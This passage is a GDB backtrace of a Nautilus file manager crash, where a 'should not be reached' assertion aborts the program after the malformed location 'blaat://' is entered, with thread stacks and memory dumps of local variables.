    at nautilus-window-manage-views.c:769
#21 0x0807d48f in nautilus_window_open_location (window=0x81bdbf0 
    location=0x83cec10 blaat://) at
nautilus-window-manage-views.c:777
#22 0x08082d56 in nautilus_window_go_to (window=0x81bdbf0 
    uri=0x83cec10 blaat://) at nautilus-window.c:361
#23 0x08082ed6 in navigation_bar_location_changed_callback
(widget=0x81c2288 
    uri=0x83cec10 blaat:// window=0x81bdbf0) at
nautilus-window.c:396
#24 0x408b1bfc in g_cclosure_marshal_VOID__STRING (closure=0x81c2fa0 
    return_value=0x0 n_param_values=2 param_values=0xbfffe358 
    invocation_hint=0xbfffe244 marshal_data=0x0) at gmarshal.c:496
#25 0x4089cf5a in g_closure_invoke (closure=0x81c2fa0 return_value=0x0
    n_param_values=2 param_values=0xbfffe358
invocation_hint=0xbfffe244)
    at gclosure.c:437
#26 0x408b060d in signal_emit_unlocked_R (node=0x8162980 detail=0 
    instance=0x81c2288 emission_return=0x0
instance_and_params=0xbfffe358)
    at gsignal.c:2822
#27 0x408aee7f in g_signal_emit_valist (instance=0x81c2288
signal_id=139 
    detail=0 var_args=0xbfffe4e0) at gsignal.c:2554
#28 0x408af12c in g_signal_emit (instance=0x81c2288 signal_id=139
detail=0)
    at gsignal.c:2612
#29 0x0806e6da in nautilus_navigation_bar_location_changed
(bar=0x81c2288)
    at nautilus-navigation-bar.c:148
#30 0x408b1bfc in g_cclosure_marshal_VOID__STRING (closure=0x81c2f08 
    return_value=0x0 n_param_values=2 param_values=0xbfffe828 
    invocation_hint=0xbfffe714 marshal_data=0x0) at gmarshal.c:496
#31 0x4089cf5a in g_closure_invoke (closure=0x81c2f08 return_value=0x0
    n_param_values=2 param_values=0xbfffe828
invocation_hint=0xbfffe714)
    at gclosure.c:437
#32 0x408b060d in signal_emit_unlocked_R (node=0x8162980 detail=0 
    instance=0x81c2328 emission_return=0x0
instance_and_params=0xbfffe828)
    at gsignal.c:2822
#33 0x408aee7f in g_signal_emit_valist (instance=0x81c2328
signal_id=139 
    detail=0 var_args=0xbfffe9b0) at gsignal.c:2554
#34 0x408af12c in g_signal_emit (instance=0x81c2328 signal_id=139
detail=0)
    at gsignal.c:2612
#35 0x0806e6da in nautilus_navigation_bar_location_changed
(bar=0x81c2328)
    at nautilus-navigation-bar.c:148
#36 0x408b141e in g_cclosure_marshal_VOID__VOID (closure=0x81c26c8 
    return_value=0xbfffec88 n_param_values=1 param_values=0x83ce8f8 
    invocation_hint=0xbfffebe4 marshal_data=0x0) at gmarshal.c:77
#37 0x4089cf5a in g_closure_invoke (closure=0x81c26c8 
    return_value=0xbfffec88 n_param_values=1 param_values=0x83ce8f8 
    invocation_hint=0xbfffebe4) at gclosure.c:437
#38 0x408b060d in signal_emit_unlocked_R (node=0x816e7c0 detail=0 
    instance=0x81c2480 emission_return=0xbfffec88 
    instance_and_params=0x83ce8f8) at gsignal.c:2822
#39 0x408ae804 in g_signal_emitv (instance_and_params=0x83ce8f8 
    signal_id=145 detail=0 return_value=0xbfffec88) at gsignal.c:2461
#40 0x403b9495 in gtk_binding_entry_activate (entry=0x817c6c8 
    object=0x81c2480) at gtkbindings.c:524
#41 0x403ba128 in binding_match_activate (pspec_list=0x8416758 
    object=0x81c2480 path_length=8 path=0x816d300 GtkEntry 
    path_reversed=0x82ffe28 yrtnEktG) at gtkbindings.c:926
#42 0x403ba3e3 in gtk_bindings_activate_list (object=0x81c2480 
    entries=0x8416750 is_release=0) at gtkbindings.c:1062
#43 0x403ba64c in _gtk_bindings_activate_event (object=0x81c2480 
    event=0x81d5790) at gtkbindings.c:1137
#44 0x404f4b46 in gtk_widget_real_key_press_event (widget=0x81c2480 
    event=0x81d5790) at gtkwidget.c:3013
#45 0x403fb047 in gtk_entry_key_press (widget=0x81c2480
event=0x81d5790)
    at gtkentry.c:1567
#46 0x4006d788 in nautilus_entry_key_press (widget=0x81c2480
event=0x81d5790)
    at nautilus-entry.c:143
#47 0x40433a08 in _gtk_marshal_BOOLEAN__BOXED (closure=0x812e710 
    return_value=0xbffff048 n_param_values=2 param_values=0xbffff188
    invocation_hint=0xbffff064 marshal_data=0x4006d62c) at
gtkmarshalers.c:82
#48 0x4089d33b in g_type_class_meta_marshal (closure=0x812e710 
    return_value=0xbffff048 n_param_values=2 param_values=0xbffff188
    invocation_hint=0xbffff064 marshal_data=0xcc) at gclosure.c:514
#49 0x4089cf5a in g_closure_invoke (closure=0x812e710 
    return_value=0xbffff048 n_param_values=2 param_values=0xbffff188
    invocation_hint=0xbffff064) at gclosure.c:437
#50 0x408b0a06 in signal_emit_unlocked_R (node=0x812e760 detail=0 
    instance=0x81c2480 emission_return=0xbffff148 
    instance_and_params=0xbffff188) at gsignal.c:2860
#51 0x408aeeeb in g_signal_emit_valist (instance=0x81c2480
signal_id=65 
    detail=0 var_args=0xbffff310) at gsignal.c:2564
#52 0x408af12c in g_signal_emit (instance=0x81c2480 signal_id=65
detail=0)
    at gsignal.c:2612
#53 0x404f5149 in gtk_widget_event_internal (widget=0x81c2480
event=0x81d5790)
    at gtkwidget.c:3269
#54 0x404f4ca3 in gtk_widget_event (widget=0x81c2480 event=0x81d5790)
    at gtkwidget.c:3075
#55 0x405004bc in gtk_window_key_press_event (widget=0x81bdbf0 
    event=0x81d5790) at gtkwindow.c:4070
#56 0x402c23b0 in bonobo_window_key_press_event (widget=0x81bdbf0 
    event=0x81d5790) at bonobo-window.c:267
#57 0x40433a08 in _gtk_marshal_BOOLEAN__BOXED (closure=0x812e710 
    return_value=0xbffff608 n_param_values=2 param_values=0xbffff748
    invocation_hint=0xbffff624 marshal_data=0x402c2374) at
gtkmarshalers.c:82
#58 0x4089d33b in g_type_class_meta_marshal (closure=0x812e710 
    return_value=0xbffff608 n_param_values=2 param_values=0xbffff748
    invocation_hint=0xbffff624 marshal_data=0xcc) at gclosure.c:514
#59 0x4089cf5a in g_closure_invoke (closure=0x812e710 
    return_value=0xbffff608 n_param_values=2 param_values=0xbffff748
    invocation_hint=0xbffff624) at gclosure.c:437
#60 0x408b0a06 in signal_emit_unlocked_R (node=0x812e760 detail=0 
    instance=0x81bdbf0 emission_return=0xbffff708 
    instance_and_params=0xbffff748) at gsignal.c:2860
#61 0x408aeeeb in g_signal_emit_valist (instance=0x81bdbf0
signal_id=65 
    detail=0 var_args=0xbffff8d0) at gsignal.c:2564
#62 0x408af12c in g_signal_emit (instance=0x81bdbf0 signal_id=65
detail=0)
    at gsignal.c:2612
#63 0x404f5149 in gtk_widget_event_internal (widget=0x81bdbf0
event=0x81d5790)
    at gtkwidget.c:3269
#64 0x404f4ca3 in gtk_widget_event (widget=0x81bdbf0 event=0x81d5790)
    at gtkwidget.c:3075
#65 0x4043388c in gtk_propagate_event (widget=0x81bdbf0
event=0x81d5790)
    at gtkmain.c:2236
#66 0x404327ce in gtk_main_do_event (event=0x81d5790) at gtkmain.c:1503
#67 0x405cd569 in gdk_event_dispatch (source=0x80d9da0 callback=0 
    user_data=0x0) at gdkevents-x11.c:2064
#68 0x4096cc11 in g_main_dispatch (context=0x80d9de8) at gmain.c:1751
#69 0x4096da6f in g_main_context_dispatch (context=0x80d9de8) at
gmain.c:2299
#70 0x4096de4a in g_main_context_iterate (context=0x80d9de8 block=1 
    dispatch=1 self=0x80c9fc0) at gmain.c:2380
#71 0x4096e558 in g_main_loop_run (loop=0x812a990) at gmain.c:2600
#72 0x40431e9d in gtk_main () at gtkmain.c:1093
#73 0x0806e322 in main (argc=7 argv=) at
nautilus-main.c:280
#74 0x40ad7f54 in __libc_start_main (main=0x806df90  argc=7 
    ubp_av=0xbffffc84 init=0x805f7e0  fini=0x40015640
    rtld_fini=0xbfffd3e8 stack_end=0x0) at
../sysdeps/generic/libc-start.c:144
Thread 6 (Thread 65541 (LWP 18315)):
#0  0x40aec101 in *__GI___sigsuspend (set=0xbf1ff98c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:55
No locals.
#1  0x408da0f8 in __pthread_wait_for_restart_signal (self=0xbf1ffbe0)
    at pthread.c:1067
	mask = {__val = {0 0 137491728 3206543816 1082972824 7 
    3206543828 1081044163 137418800 1081043976 0 1083031966
1081128656 
    1083909152 3206543860 3206543876 1081048398 135118656
3206543876 
    1083032462 0 137496432 0 1083031006 1081128656 137491728 
    1083909152 1083054916 137052696 0 3206543908 1083017006}}
#2  0x408d64d8 in pthread_cond_wait (cond=0x0 mutex=0x82b4218) at
restart.h:36
	self = (struct _pthread_descr_struct * volatile) 0xbf1ffbe0
	extr = {pu_object = 0x82b0f40 
  pu_extricate_func = 0x408d62f0 }
	already_canceled = 0
	spurious_wakeup_count = 0
#3  0x406fc815 in gnome_vfs_thread_pool_wait_for_work (state=0x82b4378)
    at gnome-vfs-thread-pool.c:156
	state = (GnomeVFSThreadState *) 0x82b4378
#4  0x406fc869 in thread_entry (cast_to_state=0x82b4378)
    at gnome-vfs-thread-pool.c:177
	state = (GnomeVFSThreadState *) 0x82b4378
#5  0x40983775 in g_thread_create_proxy (data=0x82c9f50) at
gthread.c:551
	thread = (GRealThread *) 0x82c9f50
#6  0x408d7573 in pthread_start_thread (arg=0xbf1ffbe0) at
manager.c:300
	request = {req_thread = 0x0 req_kind = REQ_CREATE req_args = {
    create = {attr = 0x0 fn = 0 arg = 0x0 mask = {__val = {
          0 }}} free = {thread_id = 0} exit = {code
= 0} 
    post = 0x0 for_each = {fn = 0 arg = 0x0}}}
	outcome = (void *) 0xfffffffc
	tmpclock = 38654705660
Thread 5 (Thread 49156 (LWP 18314)):
#0  0x40aec101 in *__GI___sigsuspend (set=0xbf3ff98c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:55
No locals.
#1  0x408da0f8 in __pthread_wait_for_restart_signal (self=0xbf3ffbe0)
    at pthread.c:1067
	mask = {__val = {0 0 3208640948 1083054916 1086268736 1086268736
    3208640964 1083017006 1086268752 0 1086268736 1083031966
1086264408 
    138339272 3208640996 1085504598 1086268736 138339272
3208641044 
    1083032462 0 1 0 1083031006 1081126996 138339272 3208641060
    1083054916 136129768 0 3208641060 1083017006}}
#2  0x408d64d8 in pthread_cond_wait (cond=0x0 mutex=0x81d2ce8) at
restart.h:36
	self = (struct _pthread_descr_struct * volatile) 0xbf3ffbe0
	extr = {pu_object = 0x81d2cd8 
  pu_extricate_func = 0x408d62f0 }
	already_canceled = 0
	spurious_wakeup_count = 0
#3  0x406fc815 in gnome_vfs_thread_pool_wait_for_work (state=0x81d2d38)
    at gnome-vfs-thread-pool.c:156
	state = (GnomeVFSThreadState *) 0x81d2d38
#4  0x406fc869 in thread_entry (cast_to_state=0x81d2d38)
    at gnome-vfs-thread-pool.c:177
	state = (GnomeVFSThreadState *) 0x81d2d38
#5  0x40983775 in g_thread_create_proxy (data=0x82af008) at
gthread.c:551
	thread = (GRealThread *) 0x82af008
#6  0x408d7573 in pthread_start_thread (arg=0xbf3ffbe0) at
manager.c:300
	request = {req_thread = 0x0 req_kind = REQ_CREATE req_args = {
    create = {attr = 0x0 fn = 0 arg = 0x0 mask = {__val = {
          0 }}} free = {thread_id = 0} exit = {code
= 0} 
    post = 0x0 for_each = {fn = 0 arg = 0x0}}}
	outcome = (void *) 0xfffffffc
	tmpclock = 38654705660
Thread 4 (Thread 32771 (LWP 18311)):
#0  0x40aec101 in *__GI___sigsuspend (set=0xbf5ff98c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:55
No locals.
#1  0x408da0f8 in __pthread_wait_for_restart_signal (self=0xbf5ffbe0)
    at pthread.c:1067
	mask = {__val = {0 0 3210738100 1083054916 1086268736 1086268736
    3210738116 1083017006 1086268752 0 1086268736 1083031966
1086264408 
    137497560 3210738148 1085504598 1086268736 137497560
3210738196 
    1083032462 0 1 0 1083031006 1081126996 137497560 3210738212
    1083054916 135438600 0 3210738212 1083017006}}
#2  0x408d64d8 in pthread_cond_wait (cond=0x0 mutex=0x812a108) at
restart.h:36
	self = (struct _pthread_descr_struct * volatile) 0xbf5ffbe0
	extr = {pu_object = 0x812a128 
  pu_extricate_func = 0x408d62f0 }
	already_canceled = 0
	spurious_wakeup_count = 0
#3  0x406fc815 in gnome_vfs_thread_pool_wait_for_work (state=0x812a0e8)
    at gnome-vfs-thread-pool.c:156
	state = (GnomeVFSThreadState *) 0x812a0e8
#4  0x406fc869 in thread_entry (cast_to_state=0x812a0e8)
    at gnome-vfs-thread-pool.c:177
	state = (GnomeVFSThreadState *) 0x812a0e8
#5  0x40983775 in g_thread_create_proxy (data=0x812a138) at
gthread.c:551
	thread = (GRealThread *) 0x812a138
#6  0x408d7573 in pthread_start_thread (arg=0xbf5ffbe0) at
manager.c:300
	request = {req_thread = 0x0 req_kind = REQ_CREATE req_args = {
    create = {attr = 0x0 fn = 0 arg = 0x0 mask = {__val = {
          0 }}} free = {thread_id = 0} exit = {code
= 0} 
    post = 0x0 for_each = {fn = 0 arg = 0x0}}}
	outcome = (void *) 0xfffffffc
	tmpclock = 38654705660
Thread 3 (Thread 16386 (LWP 18310)):
#0  0x40aec101 in *__GI___sigsuspend (set=0xbf7ff98c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:55
No locals.
#1  0x408da0f8 in __pthread_wait_for_restart_signal (self=0xbf7ffbe0)
    at pthread.c:1067
	mask = {__val = {0 0 136035448 3212835272 1082972824 7 
    3212835284 1081044163 135490496 1081043976 0 1083031966
1081128656 
    1073785808 3212835316 3212835332 1081048398 135118656
3212835332 
    1083032462 0 135468168 0 1083031006 1081128656 136035448 
    1083909152 1083054916 135429672 0 3212835364 1083017006}}
#2  0x408d64d8 in pthread_cond_wait (cond=0x0 mutex=0x8127e28) at
restart.h:36
	self = (struct _pthread_descr_struct * volatile) 0xbf7ffbe0
	extr = {pu_object = 0x8127e48 
  pu_extricate_func = 0x408d62f0 }
	already_canceled = 0
	spurious_wakeup_count = 0
#3  0x406fc815 in gnome_vfs_thread_pool_wait_for_work (state=0x8127e08)
    at gnome-vfs-thread-pool.c:156
	state = (GnomeVFSThreadState *) 0x8127e08
#4  0x406fc869 in thread_entry (cast_to_state=0x8127e08)
    at gnome-vfs-thread-pool.c:177
	state = (GnomeVFSThreadState *) 0x8127e08
#5  0x40983775 in g_thread_create_proxy (data=0x8127e58) at
gthread.c:551
	thread = (GRealThread *) 0x8127e58
#6  0x408d7573 in pthread_start_thread (arg=0xbf7ffbe0) at
manager.c:300
	request = {req_thread = 0x0 req_kind = REQ_CREATE req_args = {
    create = {attr = 0x0 fn = 0 arg = 0x0 mask = {__val = {
          0 }}} free = {thread_id = 0} exit = {code
= 0} 
    post = 0x0 for_each = {fn = 0 arg = 0x0}}}
	outcome = (void *) 0xfffffffc
	tmpclock = 38654705660
Thread 2 (Thread 32769 (LWP 18309)):
#0  0x40b97c32 in *__GI___poll (fds=0x8129d14 nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:52
	must_emulate = 0
#1  0x408d726e in __pthread_manager (arg=0xc9) at manager.c:145
	reqfd = 135437588
	ufd = {fd = 19 events = 1 revents = 0}
	manager_mask = {__val = {4294967279 4294967294 
    4294967295 }}
	n = 2000
	request = {req_thread = 0x408df080 req_kind = REQ_CREATE req_args =
{
    create = {attr = 0xbffff704 fn = 0x409835f4
      arg = 0x82c9f50 mask = {__val = {2147483648 0 0 0 0
3221223016 
          1082896753 3221223256 245 0 1082896645 1082957704 245 
          3221223576 1082846847 136103632 0 3221223576 1082847446
          3221223256 136109352 136122072 1082845221 1082957704
136122072 
          137046816 1082983264 1083909152 135022112 135026249
1083032462 
          0}}} free = {thread_id = 3221223172} exit = {code =
-1073744124} 
    post = 0xbffff704 for_each = {fn = 0xbffff704 arg = 0x409835f4}}}
Thread 1 (Thread 16384 (LWP 18308)):
#0  0x40b70bb9 in __wait4 () at __wait4:-1
No locals.
#1  0x40bf1458 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x408dccd3 in waitpid (pid=-512 stat_loc=0xfffffe00 options=-512)
    at wrapsyscall.c:181
	result = 0
	oldtype = 0
#3  0x40234b06 in libgnomeui_segv_handle (signum=6) at
gnome-ui-init.c:738
	estatus = -1073752760
	signum = -512
	in_segv = 1
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {1083028448 3221215328 0 0 32 0 3221214296 
      1082886398 1082957704 136061848 3221214744 1082886398
1082957704 
      136061848 3221214760 1082886398 1082957704 136061848
3221214776 
      1082890510 1082957704 135026216 0 1082886398 1082957704
136061848 
      3221214776 1082883014 1082957704 0 3221214408 0}} 
  sa_flags = 135026144 sa_restorer = 0xe0105002}
	pid = 0
#4  0x408dea4d in __pthread_sighandler (signo=6 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 1083055680 esi = 18308 ebp = 3221215256 esp =
3221215228 ebx = 18308 edx = 1083054916 ecx = 6 eax = 0 trapno = 0
err = 0 eip = 1085194193 cs = 35 __csh = 0 eflags = 2097734
esp_at_signal = 3221215228 ss = 43 __ssh = 0 fpstate = 0xbfffd580
oldmask = 2147483648 cr2 = 0}) at sighandler.c:38
	__tmp1 = -512
	__tmp2 = 0
	__tmp3 = -1073752704
	__tmp4 = -1073753112
	in_sighandler = 0x0
#5  
	__libc_missing_rt_sigs = 0
#6  0x40aebfd1 in __kill () at __kill:-1
No locals.
#7  0x408da69d in pthread_kill (thread=3221214592 signo=-512) at
signals.c:65
	pid = -1073752704
#8  0x408daa1b in raise (sig=0) at signals.c:181
	retcode = -1073752704
#9  0x40aed51c in *__GI_abort () at ../sysdeps/generic/abort.c:88
	act = {__sigaction_handler = {
    sa_handler = 0x409b2760  
    sa_sigaction = 0x409b2760 } sa_mask = {__val = {
      138507584 3221215576 1083656741 2 138507760 3221215576
1083656753 
      138507760 1073830616 1087052416 1082964936 3221215568
1073785334 
      1082965348 1087052448 1 0 0 2 1 137875656 1330795077
707403858 
      1083490304 1083910748 417 1083519972 1085047744 1083909984 
      1083909128 1083909152 3221216696}} sa_flags = 1073785808 
  sa_restorer = 0x1}
	sigs = {__val = {32 0 }}
#10 0x40973eda in g_logv (log_domain=0x0 log_level=G_LOG_LEVEL_ERROR 
    format=0x400c65a0 file %s: line %d (%s): should not be reached 
    args1=0xbfffddfc) at gmessages.c:509
	depth = 1
	domain = (GLogDomain *) 0x0
	data = 0x0
	log_func = 0x40974864 
	domain_fatal_mask = 5
	test_level = 6
	format = (gchar *) 0xfffffe00 
	args1 = 0xfffffe00
	buffer = file nautilus-file.c: line 361 (nautilus_file_get_internal):
should not be
reached\0\b\220ÃƒÂ§\e\b\210\237\214@\210\237\214@\024ÃƒÂ›ÃƒÂ¿Ã‚Â¿(\0\0\0$\023\213@ÃƒÂ¸\226\214@h/\034\bÃƒÂ‘R\f\bÃ‚Â°R\f\b\0\0\0\0\0ÃƒÂ›ÃƒÂ¿Ã‚Â¿\0\0\0\0\002\0\0\0\002\0\0\0
Ã‚Â¶\025\bÃƒÂ¬ÃƒÂšÃƒÂ¿Ã‚Â¿\004\0\0\0\0\0\0\0ÃƒÂ˜ÃƒÂšÃƒÂ¿Ã‚Â¿ÃƒÂ¼ÃƒÂšÃƒÂ¿Ã‚Â¿\004\0\0\0\0\0\0\0ÃƒÂ¨ÃƒÂšÃƒÂ¿Ã‚Â¿\230ÃƒÂšÃƒÂ¿Ã‚Â¿Il\230@
ÃƒÂ·\e\b\200ÃƒÂº\e\b\0\0\0\0...
	was_fatal = 0
	was_recursion = 0
	i = 2
#11 0x40973f94 in g_log (log_domain=0x0 log_level=G_LOG_LEVEL_ERROR 
    format=0x400c65a0 file %s: line %d (%s): should not be reached)
    at gmessages.c:528
	log_domain = (gchar *) 0x0
	log_level = -1073753112
	format = (gchar *) 0x0
#12 0x4007597e in nautilus_file_get_internal (uri=0x8416578 blaat:
create=0)
    at nautilus-file.c:361
	canonical_uri = 0x83cdd78 blaat:///
	directory_uri = 0x8417348 0sA\b
	relative_uri = 0x0
	file_name = 0x0
	relative_uri_tmp = 0xfffffe00 
	self_owned = 1
	vfs_uri = (GnomeVFSURI *) 0x0
	directory_vfs_uri = (GnomeVFSURI *) 0x0
	directory = (NautilusDirectory *) 0x0
	file = (NautilusFile *) 0x0
#13 0x40075a98 in nautilus_file_get_existing (uri=0x8416578 blaat:)
    at nautilus-file.c:397
	uri = 0xfffffe00 
#14 0x40067487 in nautilus_directory_get_existing_corresponding_file (
    directory=0x81d5190) at nautilus-directory.c:454
	directory = (NautilusDirectory *) 0xfffffe00
	file = (NautilusFile *) 0x0
#15 0x400612fb in nautilus_directory_invalidate_count_and_mime_list (
    directory=0x81d5190) at nautilus-directory-async.c:2128
	directory = (NautilusDirectory *) 0xfffffe00
	file = (NautilusFile *) 0x81d5190
#16 0x400613ee in nautilus_directory_force_reload_internal (
    directory=0x81d5190 file_attributes=4095)
    at nautilus-directory-async.c:2167
	directory = (NautilusDirectory *) 0x81d5190
	file_attributes = 4294966784
#17 0x400abd19 in vfs_force_reload (directory=0x81d5190)
    at nautilus-vfs-directory.c:132
	directory = (NautilusDirectory *) 0x81d5190
	all_attributes = 4294966784
#18 0x40069c03 in nautilus_directory_force_reload (directory=0x81d5190)
    at nautilus-directory.c:1595
	directory = (NautilusDirectory *) 0x81d5190
#19 0x0807e6b0 in begin_location_change (window=0x81bdbf0 
    location=0x83cec10 blaat://
type=NAUTILUS_LOCATION_CHANGE_STANDARD 
    distance=0 scroll_pos=0x0) at nautilus-window-manage-views.c:1539
	window = (NautilusWindow *) 0x81bdbf0
	type = NAUTILUS_LOCATION_CHANGE_STANDARD
	distance = 136139152
	scroll_pos = 0xfffffe00 
	directory = (NautilusDirectory *) 0x81d5190
	file = (NautilusFile *) 0x0
	current_pos = 0x0
#20 0x0807d46b in open_location (window=0x81bdbf0 
    location=0x83cec10 blaat:// force_new_window=0
new_selection=0x0)
    at nautilus-window-manage-views.c:769
	window = (NautilusWindow *) 0x81bdbf0
	location = 0x83cec10 blaat://
	new_selection = (GList *) 0xfffffe00
	target_window = (NautilusWindow *) 0x81bdbf0
#21 0x0807d48f in nautilus_window_open_location (window=0x81bdbf0 
    location=0x83cec10 blaat://) at
nautilus-window-manage-views.c:777
	window = (NautilusWindow *) 0x0
	location = 0xfffffe00 
#22 0x08082d56 in nautilus_window_go_to (window=0x81bdbf0 
    uri=0x83cec10 blaat://) at nautilus-window.c:361
	window = (NautilusWindow *) 0x0
	uri = 0xfffffe00 
#23 0x08082ed6 in navigation_bar_location_changed_callback
(widget=0x81c2288 
    uri=0x83cec10 blaat:// window=0x81bdbf0) at
nautilus-window.c:396
	uri = 0xfffffe00 
	window = (NautilusWindow *) 0x81bdbf0
#24 0x408b1bfc in g_cclosure_marshal_VOID__STRING (closure=0x81c2fa0 
    return_value=0x0 n_param_values=2 param_values=0xbfffe358 
    invocation_hint=0xbfffe244 marshal_data=0x0) at gmarshal.c:496
	closure = (GClosure *) 0x81c2fa0
	callback = 0
	data1 = 0x81c2288
	data2 = 0xfffffe00
#25 0x4089cf5a in g_closure_invoke (closure=0x81c2fa0 return_value=0x0
    n_param_values=2 param_values=0xbfffe358
invocation_hint=0xbfffe244)
    at gclosure.c:437
	marshal = 0x8060e18 
	marshal_data = 0x0
	in_marshal = 0
	closure = (GClosure *) 0x81c2fa0
	return_value = (GValue *) 0xfffffe00
	n_param_values = 4294966784
	param_values = (GValue *) 0xfffffe00
	invocation_hint = 0xfffffe00
#26 0x408b060d in signal_emit_unlocked_R (node=0x8162980 detail=0 
    instance=0x81c2288 emission_return=0x0
instance_and_params=0xbfffe358)
    at gsignal.c:2822
	continue_emission = -1073749436
	return_accu = (GValue *) 0x0
	accumulator = (SignalAccumulator *) 0x0
	tmp = (Handler *) 0x408b88fe
	handler = (Handler *) 0x81ba630
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0xbfffe70c instance = 0x81c2288 ihint = {
    signal_id = 139 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	handler_list = (Handler *) 0x81ba630
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer =
0x0}}}
	signal_id = 139
	max_sequential_handler_number = 2728
	return_value_altered = 0
#27 0x408aee7f in g_signal_emit_valist (instance=0x81c2288
signal_id=139 
    detail=0 var_args=0xbfffe4e0) at gsignal.c:2554
	signal_id = 1
	instance_and_params = (GValue *) 0xbfffe358
	stack_values = {{g_type = 135767912 data = {{v_int = 136061576 
        v_uint = 136061576 v_long = 136061576 v_ulong = 136061576 
        v_int64 = 136061576 v_uint64 = 136061576 v_float =
4.69851337e-34 
        v_double = 6.7223350420617851e-316 v_pointer = 0x81c2288} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 64 data = {{v_int = 138210320 v_uint = 138210320 
        v_long = 138210320 v_ulong = 138210320 v_int64 = 138210320 
        v_uint64 = 138210320 v_float = 5.68516823e-34 
        v_double = 6.8284971012725354e-316 v_pointer = 0x83cec10} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 1086264408 data = {{v_int = 138210320 v_uint = 138210320
        v_long = 138210320 v_ulong = 138210320 
        v_int64 = -4611717182571877360 v_uint64 = 13835026891137674256
        v_float = 5.68516823e-34 v_double = -1.9930801698490122 
        v_pointer = 0x83cec10} {v_int = 1085504598 v_uint =
1085504598 
        v_long = 1085504598 v_ulong = 1085504598 
        v_int64 = 4665488696872762454 v_uint64 = 4665488696872762454 
        v_float = 5.60892773 v_double = 7973.2509872606806 
        v_pointer = 0x40b37c56}}} {g_type = 138210320 data = {{
        v_int = 136061576 v_uint = 136061576 v_long = 136061576 
        v_ulong = 136061576 v_int64 = 4655357933223944840 
        v_uint64 = 4655357933223944840 v_float = 4.69851337e-34 
        v_double = 1737.8437809368206 v_pointer = 0x81c2288} {
        v_int = 138210320 v_uint = 138210320 v_long = 138210320 
        v_ulong = 138210320 v_int64 = 584380019300428816 
        v_uint64 = 584380019300428816 v_float = 5.68516823e-34 
        v_double = 1.3314016390560173e-269 v_pointer = 0x83cec10}}} {
    g_type = 3221218264 data = {{v_int = 1083645081 v_uint =
1083645081 
        v_long = 1083645081 v_ulong = 1083645081 
        v_int64 = 593608805453339801 v_uint64 = 593608805453339801 
        v_float = 4.72224092 v_double = 5.4746209332003371e-269 
        v_pointer = 0x40971c99} {v_int = 135713640 v_uint = 135713640
        v_long = 135713640 v_ulong = 135713640 
        v_int64 = -4611716907696467096 v_uint64 = 13835027166013084520
        v_float = 4.53874899e-34 v_double = -1.9931412044508878 
        v_pointer = 0x816d368}}} {g_type = 1083645056 data = {{
        v_int = 138337432 v_uint = 138337432 v_long = 138337432 
        v_ulong = 138337432 v_int64 = 138337432 v_uint64 = 138337432
        v_float = 5.74353519e-34 v_double = 6.8347772685099527e-316 
        v_pointer = 0x83edc98} {v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = 4617298273667907585 
        v_uint64 = 4617298273667907585 v_float = 1.40129846e-45 
        v_double = 4.9846839904785165 v_pointer = 0x1}}} {
    g_type = 136061736 data = {{v_int = 138210320 v_uint = 138210320
        v_long = 138210320 v_ulong = 138210320 
        v_int64 = -4611716701535540208 v_uint64 = 13835027372174011408
        v_float = 5.68516823e-34 v_double = -1.9931869813724497 
        v_pointer = 0x83cec10} {v_int = 134667638 v_uint = 134667638
        v_long = 134667638 v_ulong = 134667638 v_int64 =
593608804504362358 
        v_uint64 = 593608804504362358 v_float = 4.05844843e-34 
        v_double = 5.4746202950250497e-269 v_pointer = 0x806dd76}}} {
    g_type = 0 data = {{v_int = -1073748968 v_uint = 3221218328 
        v_long = -1073748968 v_ulong = 3221218328 
        v_int64 = 578393057016144920 v_uint64 = 578393057016144920 
        v_float = -1.99914837 v_double = 5.4100799925336595e-270 
        v_pointer = 0xbfffe418} {v_int = 138210320 v_uint = 138210320
        v_long = 138210320 v_ulong = 138210320 v_int64 =
583098091821657104 
        v_uint64 = 583098091821657104 v_float = 5.68516823e-34 
        v_double = 1.1158816487547663e-269 v_pointer = 0x83cec10}}} {
    g_type = 3221218328 data = {{v_int = 1083032462 v_uint =
1083032462 
        v_long = 1083032462 v_ulong = 1083032462 
        v_int64 = 584380707440018318 v_uint64 = 584380707440018318 
        v_float = 4.43012142 v_double = 1.3315173303412977e-269 
        v_pointer = 0x408dc38e} {v_int = 136061576 v_uint = 136061576
        v_long = 136061576 v_ulong = 136061576 
        v_int64 = -4611716564098735480 v_uint64 = 13835027509610816136
        v_float = 4.69851337e-34 v_double = -1.9932174984734576 
        v_pointer = 0x81c2288}}} {g_type = 1 data = {{v_int = 1
v_uint = 1 
        v_long = 1 v_ulong = 1 v_int64 = 583090360742313985 
        v_uint64 = 583090360742313985 v_float = 1.40129846e-45 
        v_double = 1.1145818855679722e-269 v_pointer = 0x1} {
        v_int = -1073748904 v_uint = 3221218392 v_long = -1073748904
        v_ulong = 3221218392 v_int64 = 578402205296485464 
        v_uint64 = 578402205296485464 v_float = -1.999156 
        v_double = 5.4177701205748975e-270 v_pointer = 0xbfffe458}}}
{
    g_type = 136061736 data = {{v_int = 135746784 v_uint = 135746784
        v_long = 135746784 v_ulong = 135746784 v_int64 =
583090360878060768 
